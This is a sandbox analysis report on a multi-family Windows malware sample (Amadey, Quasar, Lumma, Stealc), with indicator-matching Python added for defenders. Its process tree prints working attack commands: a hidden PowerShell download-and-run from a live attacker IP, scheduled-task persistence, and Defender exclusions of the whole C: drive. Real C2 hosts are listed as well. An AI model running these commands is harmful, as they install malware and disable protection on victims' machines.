Analysis

max time kernel: 67s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20250314-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
submitted: 29/03/2025, 14:09

Static task: static1

Behavioral task: behavioral1
  Sample: 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
  Resource: win7-20241010-en

Behavioral task: behavioral2
  Sample: 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
  Resource: win10v2004-20250314-en
General

Target: 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size: 938KB
MD5: fab7377d0c225be7110b381bbbe53d2e
SHA1: 3096dd62d5f3bcfaec2350e2e7484ddf4fea17b1
SHA256: 402dfdbcdac8266fdde22e6a8ecc3ad6fd795aaacda7620c4b6ecd615864dd88
SHA512: 89769c0cda927e2318ebf1b6b738040f4b723d05923194a515bdf406afd47845cd0f03e3828079bbcd4a81eabc20cd1a4ebce7b756987e0e49d31ae55c2714f5
SSDEEP: 24576:sqDEvCTbMWu7rQYlBQcBiT6rprG8a0ku:sTvC/MTQYxsWR7a0k

Note: the family tags in the submitted file name (agent-tesla, black-basta, cobalt-strike, luca-stealer) come from the submitter. The families actually identified in this run, per the Malware Config and Signatures sections below, are Amadey, Healer, Lumma, Quasar and Stealc.
Malware Config

Values marked "(label inferred)" were unlabelled in the original extraction; the labels follow the standard field order of these extractors (version, botnet/campaign tag, C2, mutex), the values are exactly as extracted.

Extracted: downloader URL (fetched by the PowerShell stage in the process tree below)
  http://176.113.115.7/mine/random.exe

Extracted: amadey
  version: 5.21 (label inferred)
  botnet: 092155 (label inferred)
  C2: http://176.113.115.6
  install_dir: bb556cff4a
  install_file: rapes.exe
  strings_key: a131b127e996a898cd19ffb2d92e481b
  url_paths: /Ni9kiput/index.php

Extracted: quasar
  version: 1.5.0 (label inferred)
  botnet/tag: Office04 (label inferred)
  C2: goku92ad.zapto.org:5000
  mutex: a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a (label inferred)
  encryption_key: BF72099FDBC6B48816529089CF1CF2CF86357D14
  install_name: Client.exe
  log_directory: Logs
  reconnect_delay: 3000
  startup_key: Quasar Modded Client Startup
  subdirectory: SubDir

Extracted: lumma
  C2 URLs:
  https://cosmosyf.top/GOsznj
  https://byteplusx.digital/aXweAX
  https://travewlio.shop/ZNxbHi
  https://skynetxc.live/AksoPA
  https://pixtreev.run/LkaUz
  https://advennture.top/GKsiio
  https://targett.top/dsANGt
  https://sparkiob.digital/KeASUp
  https://appgridn.live/LEjdAK
  https://wxayfarer.live/ALosnz
  https://70oreheatq.live/gsopp
  https://0castmaxw.run/ganzde
  https://weldorae.digital/geds
  https://steelixr.live/aguiz
  https://smeltingt.run/giiaus
  https://ferromny.digital/gwpd

Extracted: stealc
  botnet: trump (label inferred)
  C2: http://45.93.20.28
  url_path: /85a1cacf11314eb8.php
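The configs above give network indicators in three different shapes: a C2 base plus a separate url_path (Amadey, Stealc), a bare host:port for a raw TCP channel (Quasar), and full URLs whose paths rotate between builds (Lumma). The following Python is an added example for this page, not part of the sandbox report: it joins the pieces into complete indicators, defangs them for sharing, and scans proxy-style log lines. The indicator values are copied from the Malware Config section; SAMPLE_LOG is constructed for the demonstration and is not traffic from the run.

```python
"""Network indicators from the extracted configs, defanged and matched against logs.

Added example for this report; it is not part of the sandbox output. The indicator
values are copied from the "Malware Config" section above. SAMPLE_LOG is constructed
for the demonstration and is not traffic captured from the run.
"""
from urllib.parse import urlsplit

STAGER_URL = "http://176.113.115.7/mine/random.exe"   # fetched by the PowerShell stage
AMADEY_C2 = "http://176.113.115.6"
AMADEY_URL_PATHS = ["/Ni9kiput/index.php"]
QUASAR_C2 = "goku92ad.zapto.org:5000"                 # raw TCP, not HTTP
STEALC_C2 = "http://45.93.20.28"
STEALC_URL_PATH = "/85a1cacf11314eb8.php"
LUMMA_URLS = [
    "https://cosmosyf.top/GOsznj", "https://byteplusx.digital/aXweAX",
    "https://travewlio.shop/ZNxbHi", "https://skynetxc.live/AksoPA",
    "https://pixtreev.run/LkaUz", "https://advennture.top/GKsiio",
    "https://targett.top/dsANGt", "https://sparkiob.digital/KeASUp",
    "https://appgridn.live/LEjdAK", "https://wxayfarer.live/ALosnz",
    "https://70oreheatq.live/gsopp", "https://0castmaxw.run/ganzde",
    "https://weldorae.digital/geds", "https://steelixr.live/aguiz",
    "https://smeltingt.run/giiaus", "https://ferromny.digital/gwpd",
]


def build_indicators():
    """Join base C2 and url_path fields into full URLs; keep hosts and sockets too.

    Lumma rotates paths per build, so its URLs contribute host indicators only.
    """
    urls = {STAGER_URL, STEALC_C2 + STEALC_URL_PATH}
    urls |= {AMADEY_C2 + path for path in AMADEY_URL_PATHS}
    hosts = {urlsplit(u).hostname for u in urls | set(LUMMA_URLS)}
    quasar_host, quasar_port = QUASAR_C2.rsplit(":", 1)
    hosts.add(quasar_host)
    return {"urls": urls, "hosts": hosts, "sockets": {(quasar_host, int(quasar_port))}}


def defang(indicator):
    """Return a paste-safe form: http -> hxxp and the dots in the host bracketed."""
    if "://" in indicator:
        p = urlsplit(indicator)
        scheme = p.scheme.replace("http", "hxxp")
        host = p.hostname.replace(".", "[.]")
        port = f":{p.port}" if p.port else ""
        query = f"?{p.query}" if p.query else ""
        return f"{scheme}://{host}{port}{p.path}{query}"
    host, sep, port = indicator.partition(":")
    return host.replace(".", "[.]") + sep + port


def match_log(lines, indicators=None):
    """Return (line_no, match_type, value) for every proxy-style line that hits.

    An exact URL match wins; otherwise a host match is reported, so a Lumma
    domain seen with a rotated path still fires.
    """
    ind = build_indicators() if indicators is None else indicators
    hits = []
    for n, line in enumerate(lines, 1):
        for tok in line.split():
            if "://" in tok:
                if tok in ind["urls"]:
                    hits.append((n, "url", tok))
                elif urlsplit(tok).hostname in ind["hosts"]:
                    hits.append((n, "host", urlsplit(tok).hostname))
            elif tok.count(":") == 1 and tok.rsplit(":", 1)[1].isdigit():
                host, port = tok.rsplit(":", 1)
                if (host, int(port)) in ind["sockets"]:
                    hits.append((n, "socket", tok))
    return hits


# Constructed proxy log (timestamp, client, method, target, status); not from the run.
SAMPLE_LOG = """\
2025-03-29T14:09:31Z 10.0.0.5 GET http://176.113.115.7/mine/random.exe 200
2025-03-29T14:09:40Z 10.0.0.5 POST http://176.113.115.6/Ni9kiput/index.php 200
2025-03-29T14:10:02Z 10.0.0.5 GET https://ferromny.digital/rotated-path 200
2025-03-29T14:10:15Z 10.0.0.5 CONNECT goku92ad.zapto.org:5000 -
2025-03-29T14:10:20Z 10.0.0.5 GET https://www.example.com/index.html 200
"""

if __name__ == "__main__":
    ind = build_indicators()
    for url in sorted(ind["urls"]):
        print("URL    ", defang(url))
    print("SOCKET ", defang(QUASAR_C2))
    for hit in match_log(SAMPLE_LOG.splitlines()):
        print("HIT    ", hit)
```

Three of the five constructed lines match on the exact URL or the Quasar socket; the Lumma line matches on host only because its path differs from the extracted one, which is the behaviour you want for a family that changes paths per build.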
Signatures

Amadey family
Detects Healer, an antivirus-disabler dropper (3 IoCs)
  yara rule healer matched:
  behavioral2/memory/9040-29534-0x00000000002E0000-0x0000000000716000-memory.dmp
  behavioral2/memory/9040-29533-0x00000000002E0000-0x0000000000716000-memory.dmp
  behavioral2/memory/9040-29974-0x00000000002E0000-0x0000000000716000-memory.dmp
Healer family

Lumma family

Quasar family

Quasar payload (2 IoCs)
  yara rule family_quasar matched:
  behavioral2/memory/1512-129-0x000000000CF10000-0x000000000D064000-memory.dmp
  behavioral2/memory/1512-130-0x000000000D090000-0x000000000D0AA000-memory.dmp
  Both regions belong to PID 1512, which is one of the powershell.exe instances in this run (see the PowerShell and network-request signatures below), so the Quasar payload was detected in PowerShell process memory rather than in a file on disk.

Stealc family
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 5 IoCs)
  Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
  by: ce59d98f05.exe, 5796d75ec2.exe, TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE, rapes.exe (2x)
Blocklisted process makes network request (4 IoCs)
  flow 14: pid 3500 powershell.exe
  flow 35: pid 1512 powershell.exe
  flow 37: pid 1512 powershell.exe
  flow 41: pid 1512 powershell.exe
Command and Scripting Interpreter: PowerShell (1 TTPs, 7 IoCs)
Runs PowerShell with its display window hidden.
  powershell.exe pids: 3500, 1512, 5448, 1204, 464, 4500, 4880
Downloads MZ/PE file (10 IoCs)
  flow 45: pid 4884 svchost.exe
  flow 72: pid 184 rapes.exe (6 IoCs)
  flow 14: pid 3500 powershell.exe
  flow 39: pid 184 rapes.exe
  flow 46: pid 184 rapes.exe
Checks BIOS information in registry (2 TTPs, 10 IoCs)
BIOS information is often read in order to detect sandboxing environments.
  Key values queried under \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System:
  rapes.exe: VideoBiosVersion (2x), SystemBiosVersion (2x)
  ce59d98f05.exe: VideoBiosVersion, SystemBiosVersion
  5796d75ec2.exe: SystemBiosVersion, VideoBiosVersion
  TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE: SystemBiosVersion, VideoBiosVersion
Checks computer location settings (2 TTPs, 3 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
  Key value queried: \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation
  by: mshta.exe, TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE, rapes.exe
Deletes itself (1 IoCs)
  pid 948 w32tm.exe
Drops startup file (4 IoCs)
  powershell.exe created, then opened for modification:
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_64d01e76.cmd
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f959e97a.cmd
Executes dropped EXE (47 IoCs)
  3080 TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE
  184 rapes.exe
  1776 u75a1_003.exe
  5556 ae9ccc196b.exe
  2556 rapes.exe
  3888 tzutil.exe
  948 w32tm.exe
  7612 ce59d98f05.exe
  9808 5796d75ec2.exe
  12088 751a73f7f3.exe
  8fe1ZIHI3C10.exe (37 instances): 12764, 12912, 13032, 13116, 13240, 6208, 6340, 6524, 6628, 6760, 7040, 3372, 7268, 7628, 6104, 8204, 8484, 8860, 9072, 9228, 9428, 9608, 10220, 10444, 10620, 10792, 10988, 11164, 11284, 11488, 11704, 11896, 12276, 4916, 12396, 6236, 5784
  Note: pid 5784 is attributed to 8fe1ZIHI3C10.exe here but appears as MSBuild.exe in the EnumeratesProcesses signature, and it is the target of the SetThreadContext call and the nine WriteProcessMemory calls from ae9ccc196b.exe (pid 5556), consistent with code injected into that process.
Identifies Wine through registry keys (2 TTPs, 5 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
  Key opened: \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine
  by: TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE, rapes.exe (2x), ce59d98f05.exe, 5796d75ec2.exe
Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk, where infostealers often target it.
Adds Run key to start application (2 TTPs, 41 IoCs)
  Distinct entries (all written with Set value (str); backslashes unescaped), with occurrence counts:
  \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemMonitorUpdate = "C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe" by 8fe1ZIHI3C10.exe (36x)
  \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5796d75ec2.exe = "C:\Users\Admin\AppData\Local\Temp\10369680101\5796d75ec2.exe" by rapes.exe (1x)
  \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ce59d98f05.exe = "C:\Users\Admin\AppData\Local\Temp\10369670101\ce59d98f05.exe" by rapes.exe (1x)
  \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\751a73f7f3.exe = "C:\Users\Admin\AppData\Local\Temp\10369690101\751a73f7f3.exe" by rapes.exe (1x)
  \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" by svchost.exe (1x)
  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" by svchost.exe (1x)
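The sandbox emits one record per registry write in the form `Set value (str) <key> = "<data>" <process>`, with backslashes in the data doubled, so the 41 Run-key IoCs are mostly repeats of a handful of persistence entries. The Python below is an added example for this page, not sandbox code: it parses that record format, collapses the records into distinct (key, data, process) entries with counts, and flags machine-wide (HKLM) scope and launch paths in user-writable locations. SAMPLE is a six-record excerpt copied from the list above; the parser runs unchanged over the full list.

```python
"""Collapse the sandbox's flattened Run-key IoC records into distinct persistence entries.

Added example for this report, not sandbox code. The sandbox emits one record per
registry write in the form:  Set value (str) <key> = "<data>" <process>
SAMPLE is a six-record excerpt copied from the "Adds Run key" list in this report
(the full list has 41 records); the parser works on the whole list unchanged.
"""
import re
from collections import Counter

RUN_HKU = r"\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
RUN_HKLM = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
AIT = r'"C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"'
SMU = r'"C:\\Users\\Admin\\AppData\\Local\\Temp\\8fe1ZIHI3C10.exe"'

SAMPLE = " ".join([
    "Set value (str) " + RUN_HKU + r"\SystemMonitorUpdate = " + SMU + " 8fe1ZIHI3C10.exe",
    "Set value (str) " + RUN_HKU + r"\SystemMonitorUpdate = " + SMU + " 8fe1ZIHI3C10.exe",
    "Set value (str) " + RUN_HKU + r"\5796d75ec2.exe = "
    + r'"C:\\Users\\Admin\\AppData\\Local\\Temp\\10369680101\\5796d75ec2.exe" rapes.exe',
    "Set value (str) " + RUN_HKU + r"\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = " + AIT + " svchost.exe",
    "Set value (str) " + RUN_HKLM + r"\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = " + AIT + " svchost.exe",
    "Set value (str) " + RUN_HKU + r"\SystemMonitorUpdate = " + SMU + " 8fe1ZIHI3C10.exe",
])

# value type, key (no spaces), quoted data (may contain spaces), writing process
RECORD = re.compile(r'Set value \((\w+)\) (\\REGISTRY\\\S+) = "([^"]*)" (\S+)')

# Launch locations a standard user can write to; any of these in a Run value is a red flag.
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")


def normalize_key(key):
    """Map the kernel-style \\REGISTRY\\... path onto the HKLM / HKU hive names."""
    if key.startswith("\\REGISTRY\\MACHINE\\"):
        return "HKLM" + key[len("\\REGISTRY\\MACHINE"):]
    if key.startswith("\\REGISTRY\\USER\\"):
        return "HKU" + key[len("\\REGISTRY\\USER"):]
    return key


def parse_records(text):
    """Yield one dict per raw record, with the sandbox's doubled backslashes undone."""
    for _vtype, key, data, proc in RECORD.findall(text):
        yield {"key": normalize_key(key), "data": data.replace("\\\\", "\\"), "process": proc}


def summarize(text):
    """Distinct (key, data, process) triples, most frequent first, with scope flags."""
    counts = Counter((r["key"], r["data"], r["process"]) for r in parse_records(text))
    rows = []
    for (key, data, proc), n in counts.most_common():
        rows.append({
            "key": key, "name": key.rsplit("\\", 1)[1], "data": data, "process": proc,
            "count": n,
            "scope": "machine" if key.startswith("HKLM") else "user",
            "user_writable": any(m in data.lower() for m in USER_WRITABLE),
        })
    return rows


if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(f'{row["count"]:>3}x {row["scope"]:<7} {row["name"]:<40} {row["data"]}'
              f'  <- {row["process"]}  user_writable={row["user_writable"]}')
```

On the excerpt this yields four distinct entries from six records; on the full list it yields the six entries shown above, with the SystemMonitorUpdate value accounting for 36 of the 41 writes. Every launch path lands under AppData or ProgramData, and the aitstatic.exe entry is written to both the user and the machine Run key.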
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
AutoIT Executable (1 IoCs)
AutoIT scripts compiled to PE executables.
  yara rule autoit_exe matched: behavioral2/files/0x000300000001dba1-29501.dat
Suspicious use of NtSetInformationThreadHideFromDebugger (5 IoCs)
  3080 TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE, 184 rapes.exe, 2556 rapes.exe, 7612 ce59d98f05.exe, 9808 5796d75ec2.exe
Suspicious use of SetThreadContext (1 IoCs)
  PID 5556 (ae9ccc196b.exe) set the thread context of PID 5784 (procid_target 130)
Drops file in Windows directory (1 IoCs)
  File created: C:\Windows\Tasks\rapes.job by TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 64 IoCs)
Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
  by: 8fe1ZIHI3C10.exe (36x), powershell.exe (6x), cmd.exe (5x), taskkill.exe (4x), 751a73f7f3.exe (2x, one of them via the ...\Control\Nls\Language spelling), schtasks.exe, ce59d98f05.exe, u75a1_003.exe, 5796d75ec2.exe, 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe, MSBuild.exe, chcp.com, mshta.exe, TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE, rapes.exe
  Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage by 751a73f7f3.exe
Kills process with taskkill (5 IoCs)
  taskkill.exe pids: 4924, 4128, 12552, 228, 7692
Modifies registry class (1 IoCs)
  Key created: \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000_Classes\Local Settings by rapes.exe
Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid 2028 schtasks.exe
Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  pid 1512 powershell.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  3500 powershell.exe (2x), 3080 TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE (2x), 184 rapes.exe (2x), 1512 powershell.exe (3x), 464 powershell.exe (3x), 5448 powershell.exe (3x), 4500 powershell.exe (3x), 4880 powershell.exe (3x), 2556 rapes.exe (2x), 1204 powershell.exe (3x), 5784 MSBuild.exe (4x), 12764 8fe1ZIHI3C10.exe (18x), 12912 8fe1ZIHI3C10.exe (11x), 13032 8fe1ZIHI3C10.exe (5x)
Suspicious behavior: MapViewOfSection (3 IoCs)
  1776 u75a1_003.exe (3x)
Suspicious use of AdjustPrivilegeToken (47 IoCs)
  Token: SeDebugPrivilege, enabled by:
  powershell.exe: 3500, 1512, 464, 5448, 4500, 4880, 1204
  taskkill.exe: 4128, 12552, 228, 7692
  8fe1ZIHI3C10.exe (36 instances): 12764, 12912, 13032, 13116, 13240, 6208, 6340, 6524, 6628, 6760, 7040, 3372, 7268, 7628, 6104, 8204, 8484, 8860, 9072, 9228, 9428, 9608, 10220, 10444, 10620, 10792, 10988, 11164, 11284, 11488, 11704, 11896, 12276, 4916, 12396, 6236
Suspicious use of FindShellTrayWindow (10 IoCs)
  3224 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe (3x), 12088 751a73f7f3.exe (7x)

Suspicious use of SendNotifyMessage (10 IoCs)
  3224 2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe (3x), 12088 751a73f7f3.exe (7x)
Suspicious use of WriteProcessMemory (64 IoCs)
  parent pid (process) -> child pid [procid_target] (count):
  3224 (2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe) -> 3368 [86] (3x)
  3224 (2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe) -> 408 [87] (3x)
  3368 (cmd.exe) -> 2028 [89] (3x)
  408 (mshta.exe) -> 3500 [92] (3x)
  3500 (powershell.exe) -> 3080 [97] (3x)
  3080 (TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE) -> 184 [100] (3x)
  184 (rapes.exe) -> 1760 [104] (3x)
  1760 (cmd.exe) -> 5236 [106] (3x)
  5236 (cmd.exe) -> 1512 [108] (3x)
  1512 (powershell.exe) -> 464 [109] (3x)
  184 (rapes.exe) -> 6060 [111] (3x)
  6060 (cmd.exe) -> 32 [113] (3x)
  32 (cmd.exe) -> 5448 [115] (3x)
  5448 (powershell.exe) -> 4500 [116] (3x)
  184 (rapes.exe) -> 1776 [118] (3x)
  1776 (u75a1_003.exe) -> 1884 [119] (2x)
  1776 (u75a1_003.exe) -> 4884 [120] (2x)
  1884 (cmd.exe) -> 4880 [126] (2x)
  184 (rapes.exe) -> 5556 [127] (2x)
  5556 (ae9ccc196b.exe) -> 5784 [130] (9x)
  1512 (powershell.exe) -> 1796 [132] (2x)
  The two or three writes per parent/child pair are the normal process-creation pattern; the nine writes from 5556 into 5784, together with the SetThreadContext call above, are consistent with code injection into pid 5784.
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(indented by parent/child depth; each entry gives the image path, its command line, the behaviours flagged and its PID)

C:\Users\Admin\AppData\Local\Temp\2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID: 3224

  C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c schtasks /create /tn OjCESma0GQ6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\mWP0iAltw.hta" /sc minute /mo 25 /ru "Admin" /f
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 3368

    C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /create /tn OjCESma0GQ6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\mWP0iAltw.hta" /sc minute /mo 25 /ru "Admin" /f
      - System Location Discovery: System Language Discovery
      - Scheduled Task/Job: Scheduled Task
      PID: 2028

  C:\Windows\SysWOW64\mshta.exe
    Command line: mshta C:\Users\Admin\AppData\Local\Temp\mWP0iAltw.hta
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 408

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Downloads MZ/PE file
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 3500

      C:\Users\Admin\AppData\Local\TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE
        Command line: "C:\Users\Admin\AppData\Local\TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE"
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Checks computer location settings
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Drops file in Windows directory
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        PID: 3080

        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          - Identifies VirtualBox via ACPI registry values (likely anti-VM)
          - Downloads MZ/PE file
          - Checks BIOS information in registry
          - Checks computer location settings
          - Executes dropped EXE
          - Identifies Wine through registry keys
          - Adds Run key to start application
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - System Location Discovery: System Language Discovery
          - Modifies registry class
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
          PID: 184

          C:\Windows\SysWOW64\cmd.exe
            Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
            PID: 1760

            C:\Windows\SysWOW64\cmd.exe
              Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"
              - System Location Discovery: System Language Discovery
              - Suspicious use of WriteProcessMemory
              PID: 5236

              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression"
                - Blocklisted process makes network request
                - Command and Scripting Interpreter: PowerShell
                - Drops startup file
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: AddClipboardFormatListener
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of WriteProcessMemory
                PID: 1512

                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                  - Command and Scripting Interpreter: PowerShell
                  - System Location Discovery: System Language Discovery
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 464

                C:\Windows\SysWOW64\cmd.exe
                  Command line: "cmd" /K CHCP 437
                  - System Location Discovery: System Language Discovery
                  PID: 1796

                  C:\Windows\SysWOW64\chcp.com
                    Command line: CHCP 437
                    - System Location Discovery: System Language Discovery
                    PID: 752

                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Command line: powershell -Command "Add-MpPreference -ExclusionPath 'C:'"
                    - Command and Scripting Interpreter: PowerShell
                    - System Location Discovery: System Language Discovery
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
                    PID: 1204

                C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe
                  Command line: "C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe"
                  - Executes dropped EXE
                  - Adds Run key to start application
                  - System Location Discovery: System Language Discovery
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 12764

                C:\Users\Admin\AppData\Local\Temp\4dlzDAIffoKl.exe
                  Command line: "C:\Users\Admin\AppData\Local\Temp\4dlzDAIffoKl.exe"
                  PID: 12560

          C:\Windows\SysWOW64\cmd.exe
            Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10369631121\8BNn7ce.cmd"
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
            PID: 6060

            C:\Windows\SysWOW64\cmd.exe
              Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10369631121\8BNn7ce.cmd"
              - Suspicious use of WriteProcessMemory
              PID: 32

              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression"
                - Command and Scripting Interpreter: PowerShell
                - Drops startup file
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of WriteProcessMemory
                PID: 5448

                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                  - Command and Scripting Interpreter: PowerShell
                  - System Location Discovery: System Language Discovery
